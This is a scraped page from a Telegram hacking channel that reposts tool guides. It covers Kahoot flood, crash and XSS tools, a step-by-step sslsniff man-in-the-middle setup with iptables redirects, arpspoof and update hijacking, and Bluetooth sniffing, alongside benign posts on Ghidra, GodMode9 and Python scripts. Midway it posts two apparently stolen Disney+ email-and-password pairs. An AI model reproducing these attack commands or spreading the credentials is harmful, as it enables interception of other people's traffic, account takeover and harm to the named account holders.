UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Reverse engineering termux-linux :
t.me/UndercodeTesting

1) kahoot-flood - using an old school denial of service technique, this program automatically joins a game of kahoot an arbitrary number of times. For instance, you can register the nicknames "alex1", "alex2", ..., "alex100".
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-flood

2) kahoot-rand - connect to a game an arbitrary number of times (e.g. 100) and answer each question randomly. If you connect with enough names, one of them is bound to win.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-rand

3) kahoot-profane - circumvent Kahoot's profanity detector, allowing you to join with any nickname (but with extra length restrictions; it has to be short).
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-profane

4) kahoot-play - play kahoot regularlyβ€”as if you were using the online client.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-play

5) kahoot-html - I have notified Kahoot and they have fixed this issue. It used to allow you to join a game of kahoot a bunch of times with HTML-rich nicknames. This messes with the lobby of a kahoot game. See the screenshot in the example section.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-html

6) kahoot-crash - trigger an exception on the host's computer. This no longer prevents the game from functioning, so it is a rather pointless "hack"
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-crash

7) kahoot-xss - since I discovered this security hole, I contacted Kahoot and they fixed it. This used to run arbitrary JavaScript code on the host's computer. This exploited a bug with the pre-game player list, which did not sanitize HTML tags. The exploit itself was rather complicated due to the fact that nicknames are limited to 15 characters.
> https://github.com/unixpickle/kahoot-hack/blob/master/kahoot-xss

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) First, you must have the Go programming language INSTALLED on your machine.

Once you have Go installed and a GOPATH configured, you can use the following command to install the dependencies:

2) go get github.com/gorilla/websocket

πŸ¦‘ Android
Download Termux on Android device and type this command line:

> apt update

> apt install curl

> curl https://raw.githubusercontent.com/unixpickle/kahoot-hack/master/kh-tmux-setup.sh
> kh-tmux-setup.sh

>chmod +x kh-tmux-setup.sh

> ./kh-tmux-setup.sh

βœ… verified by undercoder

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission

OFFICIAL NSA SITE:

> https://www.ghidra-sre.org/ghidra_9.1.2_PUBLIC_20200212.zip
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Software reverse engineering by NSA

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) Extract the JDK: dl

2) Right-click on the zip file and click Extract All...

3) Click Extract

4) Open Environment Variables window:

5) Windows 10: Right-click on Windows start button, and click System

Windows 7: Click Windows start button, right-click on Computer, and click Properties

6) Click Advanced system settings

7) Click Environment variables...

8) Add the JDK bin directory to the PATH variable:

9) Under System variables, highlight Path and click Edit...

10) At the end of the the Variable value field, add a semicolon followed by <path of extracted JDK dir>\bin
Click OK
Click OK
Click OK

11) Restart any open Command Prompt windows for changes to take effect
Linux and macOS (OS X): Extract the JDK distribution (.tar.gz file) to your desired location, and add the JDK's bin directory to your PATH:

12) Extract the JDK:
tar xvf <JDK distribution .tar.gz>

13) Open ~/.bashrc with an editor of your choice. For example:
vi ~/.bashrc

14) At the very end of the file, add the JDK bin directory to the PATH variable:
export PATH=<path of extracted JDK dir>/bin:$PATH
Save file

15) Restart any open terminal windows for changes to take effect

πŸ¦‘In some cases, you may want Ghidra to launch with a specific version of Java instead of the version that Ghidra automatically locates. To force Ghidra to launch with a specific version of Java, set the JAVA_HOME_OVERRIDE property in the support/launch.properties file. If this property is set to an incompatible version of Java, Ghidra will revert to automatically locating a compatible version. Note that some Java must still be on the PATH in order for Ghidra to use the JAVA_HOME_OVERRIDE property. This limitation will be addressed in a future version of Ghidra.

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘CIA TOOL- GodMode9 Explorer - A full access file browser for the Nintendo 3DS console :godmode:
T.me/UndercodeTesting

πŸ¦‘ The recommended bootloader for use with GodMode9 is fastboot3DS. There are known issues for some users when using the standard setup based on boot9strap and Luma3DS. If you insist on using that setup follow the instructions found in a certain guide. Here's how to set up GodMode9 (and fastboot3DS) up quickly:

1) Download OpenFirmInstaller and follow the quick setup instructions found there.
> https://github.com/d0k3/GodMode9

2) Copy the gm9 folder from the release archive to your SD card. Then, get good versions of seeddb.bin and encTitleKeys.bin from somewhere (don't ask me!) and put these two files into sd:/gm9/support (optional but recommended for full functionality).
It is also recommended you setup the RTC clock if you're running GodMode9 for the first time.

3) Find the option via HOME button -> More.... Also keep in mind that you should fix your system OS clock afterwards. While you're in the More... menu, you may also set screen brightness to a fixed value of your choosing and manually calibrate the touch screen (not recommended - try the automatic configuration first).
Helpful hint #1: Go here for step by steps on doing some common tasks in GodMode9. Especially users coming from Decrypt9WIP or Hourglass9 may find this to be helpful.
Helpful hint #2: Never unlock the red write permission level unless you know exactly what you're doing.

4) You will notice that prompt when it comes up, it features a completely red screen. It is recommended you stay on the yellow permission level or below at all times to be completely safe. Also read more on the write permissions system below.

πŸ¦‘<A> button: The <A> button is the 'confirm' / 'choose' button. It confirms prompts and selects entries in menus. In the main file view, it pulls up a submenu for files and opens directories (use <R+A> on directories for a submenu, also including the invaluable title search). In the hexviewer, <A> switches into edit mode.

<B> button: The <B> button is the 'cancel' / 'return' button. Use it to leave menus without action, hold it on file operations to cancel said file operations.

<X> button: In the main file view, the <X> button deletes (marked) files. With <R+X> files are renamed.

<Y> button: In the main file view, the <Y> button copies and pastes files. With <R+Y> you can create folders and dummy files.

<L> button: The <L> button is the 'mark' button. Use it with <LEFT> / <RIGHT> to mark / unmark all files in a folder, hold it and use <UP> / <DOWN> to select multiple files.

<R> button: The <R> button is the 'switch' button. It switches buttons to their secondary function. Notable exceptions are <R+L> for a screenshot (works almost anywhere),

<R+LEFT> / <R+RIGHT> to switch panes and <R+DOWN> to reload the file listing.

<START> button: Use the <START> button to reboot from GodMode9. Use <R+START> to poweroff your 3DS.

<SELECT> button: The <SELECT> button clears or restores the clipboard (depending on if it's empty or not).

<HOME> button: The <HOME> button enters the HOME menu, including the scripts / payloads submenus, options for formatting the SD, setting the RTC, and more. The

<POWER> button is an alternative way of entering the HOME menu.

<R+UP> combo: This little known keycombo, when held at startup, pauses the GodMode9 boot so that you can stare at the splash screen for a little longer.

<R+LEFT> combo: If you have installed GodMode9 as your bootloader, this keycombo enters the bootmenu. Hold on startup! If you built GodMode9 as SALTMODE and have it as a bootloader, the keycombo is simply the <START> button.

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘HACK WIFI AIRPLANE
> Using SSH through airplane WiFi that blocks port 22
instagram.com/UndercodeTesting

1) Many aircraft that offer wifi only permit access to machines on port 80/443, the standard http(s) ports. If you want to SSH, you have to set up an intermediate machine that hosts the SSH service on either port 80 or 443. An easy (and free) way to do this is via a Google free-tier micro instance.

2) These instances have a 1 GB transfer ceiling per month, but so long are you are only transmitting textual data a few days per month, this limit should not be easily exceeded. Set up one of these VMs via the Google Cloud console, and select CentOS 7 as the disk image. Make sure that you allow http/https traffic on the instance, the two checkboxes in the Firewalls section of the VM settings.

3) Optionally, set a static external IP address for your server in the VM config, in case you don't want to look up the IP each time. Then, ssh into the new VM (the IP address will be listed as the "external IP" in the list of instances) and edit your /etc/ssh/sshd_config file, changing the Port 22 line to Port 80.

4) By default selinux will only allow the SSH service to use port 22, so you have to change your selinux permissions as well. Enter the following commands into the VM:

> sudo su

> semanage port -m -t ssh_port_t -p tcp 80

> firewall-cmd --permanent --zone=public --add-port=80/tcp

> firewall-cmd --reload

> systemctl restart sshd.service

> Make sure that SSH is listening on port 80:

ss -tnlp | grep ssh
Example output:

LISTEN 0 128 *:80 *:* users:(("sshd",pid=1895,fd=3))
LISTEN 0 128 :::80 :::* users:(("sshd",pid=1895,fd=4))
If so, log out and attempt to SSH into your server on the new port:

ssh 123.45.67.89 -p80

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘AUTOMATE MITM ATTACK- HACK ACC AND MORE...
T.me/UndercodeTesting

πŸ¦‘REQUIRE :

openssl, libboost1.35-dev, libboost-filesystem1.35-dev,

libboost-thread1.35-dev, liblog4cpp5-dev, Linux 2.4/2.6 (or BSD)

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/moxie0/sslsniff.git

2) run "./configure" and "make". (You'll have
to make some changes to build on BSD systems, see below under "Setting up
pf")

πŸ¦‘There are two ways to run this: in "authority" mode or "targeted" mode.

A) Authority Mode:

1) In this mode, sslsniff acts as if it is a CA which dynamically generates
certificates on the fly.
> If you were, for instance, able to obtain a CA
certificate somehow, you could run it in this mode and it would dynamically
create and sign new certificates for whatever site you're trying to connect
to.

2) This mode is also useful for exploiting implementations that do not properly
verify BasicConstraints, as any valid leaf node certificate could be used
instead of a CA cert.

3) You would run sslsniff as:
./sslsniff -a -s <$listenPort> -w <$logFile> -c <$caCert>

B) Targeted Mode:

1) In this mode, sslsniff is given a directory full of certificates, which it
uses for targeted MITM attacks against the hosts those certificates are
signed for.

2) This mode is useful if you are able to forge specific
certificates, or if you have certificates that were obtained for the "null
prefix" vulnerability that I published. There are sample null prefix
certificates in the "certs" directory that comes with sslsniff, but be
sure to specify "-m IPSCACLASEA1.crt" if you wish to use those. (Note:
the targeted certs have been removed for legal reasons, but the universal
wildcard cert remains)

3) You would run sslsniff as:
./sslsniff -t -s <$listenPort> -w <$logFile> -m IPSCACLASEA1.crt \
-c <$certDir>


@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘MITM AUTO Other options:

* sslsniff can be configured to only attack certain clients. In this case,
you need to specify -f <ff,ie,safari,opera> -h <$httpListenPort>

* sslsniff can be configured to deny OCSP requests from clients. In this
case, you need to specify -d

* sslsniff can be configured to only log HTTP POSTS. In this case, you
need to specify -p

* sslsniff can be configured to hijack Mozilla auto-updates. In this case,
you need to specify -u <$updateXmlDir>, where $updateXmlDir contains the
XML files for whatever binaries you want to have sslsniff auto-update,
one for each platform. There are sample XML files in the "update"
directory that comes with sslsniff.

* sslsniff can be configured to hijack Firefox/Thunderbird addon
auto-updates. In this case, you need to specify -e <url> -j <sha256sum>
where <url> is the URL where your custom addon is located, and <sha256sum>
is the sha256sum of that addon.
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ AUTO MITM SETTING UP :
Setting up iptables
-------------------

1) Flip your machine into ip_forward mode
(echo 1 > /proc/sys/net/ipv4/ip_forward)

2) Add a rule to intercept HTTPS traffic
(iptables -t nat -A PREROUTING -p tcp --destination-port 443
-j REDIRECT --to-ports <$listenPort>)

3) If you're going to do client fingerprinting, add a rule to
intercept HTTP traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-ports <$httpListenPort>)

4) Add a rule to intercept imaps traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 993 \
-j REDIRECT --to-ports <$listenPort>)

5) Add a rule to intercept pop3s traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 995 \
-j REDIRECT --to-ports <$listenPort>)

6) Add a rule to intercept irc over ssl traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \
-j REDIRECT --to-ports <$listenPort>)

πŸ¦‘Setting up pf
-------------

1) Basic support for pf is now included. Set up firewall rules similar to
those above, and change util/Destination.cpp by undefining HAVE_NETFILTER
and defining HAVE_PF at the top.

πŸ¦‘ Running arpspoof
--------------------------

1) Assuming we want to intercept SSL traffic from 172.17.10.36, we need to
trick that host into thinking that we're the router. Using arpspoof, we
can convince the target that the router's MAC address is our MAC address.

2) * arpspoof -i eth0 -t 172.17.10.36 172.17.8.1

At this point, any SSL traffic should get proxied by sslsniff and logged to
a file.


βœ… VERIFIED BY UNDERCODE
@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ FULL AUTOMATE MITM ATTACK
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2019-2020 so helpfull scripts termux-linux :
t.me/UndercodeTesting

Make sure you've already git installed. Then you can run the following commands to get the scripts on your computer:

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

OS X, Linux and Windows,termux

1) git clone https://github.com/Logan1x/Python-Scripts.git

2) cd Python-Scripts/bin


πŸ¦‘Air Quality Script
This script renders the air quality from the location of the user

The location is fetched using the user's IP address

This script requires a key from WAQI.

It is free and can be fetched from http://aqicn.org/data-platform/token/#/

Usage Instructions
python air-quality.py token

πŸ¦‘Approximating pi
This script is useful to show a way to approximate the value of pi using a Monte Carlo method. It is also optimized using the @jit (just-in-time) decorator from the numba library.

πŸ¦‘Blog Reader
Blog Reader is the terminal reader that scrapes the article from planet dgplug and displays it on the terminal.

It separates the content accrding to the screen size.

python Blog_reader.py
Bulk add users to Twitter list
Simple script helps you mass add users to your twitter list to follow (Ex: Bitcoin/Altcoins official account, news, traders...)

πŸ¦‘Prepare list screen names
Setup your app and get an access token
pip install twitter
python bulk_add_twitter_list.py

πŸ¦‘Caesar Cipher
Encrypts or Decrypts any message you want, simply enter the message and the rotation number

python caesar_cipher.py

πŸ¦‘contributors list :

python .\contributors.py https://github.com/Logan1x/Python-Scripts/
where the argument is the url of the repo

you may need to install packages like PIL@1.1.7 and requests if not installed

πŸ¦‘End To End Encryption
It is a simple program to implement and understand the basic of end_to_end encryption. Here I am using caesar cipher to encrypt but in reality they use algotihms lile SHA-1, RSA etc.

python end_to_end.py

πŸ¦‘Expense Manager
Simple GUI program which helps you calculate your expenses, monitor them just through mouse clicks. All you have to do is run the script and choose an option from the menu which will displayed when you run the script. Enter Your Expenses as eg: "Biscuits Rs 15" " rs " ignore the quotes.

python expense_manger.py

πŸ¦‘Facebook Auto Post

This is python script that log in into facebook and post the status.

You can see live execution of this script here.

pip install -r facebook-auto-post.requirements.txt
python facebook-auto-post.py
Find Large Files
Searches a file location and subdirectories for files larger than a given size. Useful for phones which might hide files in FileExplorer, but allow use as flash memory. Directly prints results if run directly. May also be imported, yielding results one by one.

πŸ¦‘FTP Download File
A simple application to download a file via FTP with the given remote and local path Parameters:

-hh hostname
-u username
-p password
-rd remote directory
-ld local directory
python ftp_download_file.py

πŸ¦‘Fetch HTML
This script fetch html response from the provided url and parse xml tag to get only text content and print out.

python fetch_html.py https://github.com

πŸ¦‘Get External IP
Gets the external IP-Address from the current machine and prints it to the console

python getExternalIp.py
Group files by type
Group files by their extensions
Files are moved into folders with extension names
Usage Instructions
python group_file_by_type.py 'C:\\test\\products'

πŸ¦‘Handy offline dictionary
A tiny offline dictionary app based on nltk wordnet and pyqt5

cd dictionary
python app.py


βœ… + much more on their readme file
e n j o y

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘2020 Hacking Neural Networks :
youtube.com/undercode

> an offensive manner (bug hunting, shellcode obfuscation, etc.) and how to exploit neural networks found in the wild (information extraction, malware injection, backdooring, etc.)

πŸ¦‘The exercises :

0 - Last Layer Attack
1 - Backdooring
2 - Extracting Information
3 - Brute Forcing
4 - Neural Overflow
5 - Malware Injection
6 - Neural Obfuscation
7 - Bug Hunting
8 - GPU Attack


πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) Keras: Installing Keras can be tricky. We refer to the official installation guide at https://keras.io/#installation and suggest TensorFlow as a backend (using the GPU-enabled version, if one is available on the machine).

2) NumPy, SciPy and scikit-image: NumPy and SciPy are excellent helper packages, which are used throughout all exercises. Following the official SciPy instructions should also install NumPy https://www.scipy.org/install.html. We will also need to install scikit-image for image loading and saving: https://scikit-image.org/docs/stable/install.html.

3) PyCuda: PyCuda is required for the GPU-based attack exercise. If no nVidia GPU is available on the machine, this can be skipped. https://wiki.tiker.net/PyCuda/Installation

4) NLTK: NLTK provides functionalities for natural language processing and is very helpful for some of the exercises. https://www.nltk.org/install.html

E N J O Y

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ DISNEY + βœ…
jarrettbuilding@gmail.com:Anom4u8!

saniul@hotmail.com:slAynet1230
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘BLUETOOTH HACKING :

1) Debian / Ubuntu

sudo apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev \
pkg-config libpcap-dev python-numpy python-pyside python-qt4
Fedora / Red Hat

su -c "yum install libusb1-devel make gcc wget tar bluez-libs-devel"

2) Mac OS X users can use either MacPorts or Homebrew to install the required packages:

brew install libusb wget cmake pkg-config libpcap
or
sudo port install libusb wget cmake python27 py27-numpy py27-pyside

3) FreeBSD users can install the host tools and library directly from the ports and package system:

sudo pkg install ubertooth
libbtbb

4) Next the Bluetooth baseband library (libbtbb) needs to be built for the Ubertooth tools to decode Bluetooth packets:

wget https://github.com/greatscottgadgets/libbtbb/archive/2018-12-R1.tar.gz -O libbtbb-2018-12-R1.tar.gz
tar -xf libbtbb-2018-12-R1.tar.gz
cd libbtbb-2018-12-R1
mkdir build
cd build
cmake ..
make
sudo make install

5) Linux users: if you are installing for the first time, or you receive errors about finding the library, you should run:

sudo ldconfig
Ubertooth tools

6) The Ubertooth repository contains host code for sniffing Bluetooth packets, configuring the Ubertooth and updating firmware. All three are built and installed by default using the following method:

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) wget https://github.com/greatscottgadgets/ubertooth/releases/download/2018-12-R1/ubertooth-2018-12-R1.tar.xz

2) tar xf ubertooth-2018-12-R1.tar.xz

3) cd ubertooth-2018-12-R1/host

4) mkdir build

5) cd build

6) cmake ..

7) make

8) sudo make install

βœ… >
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM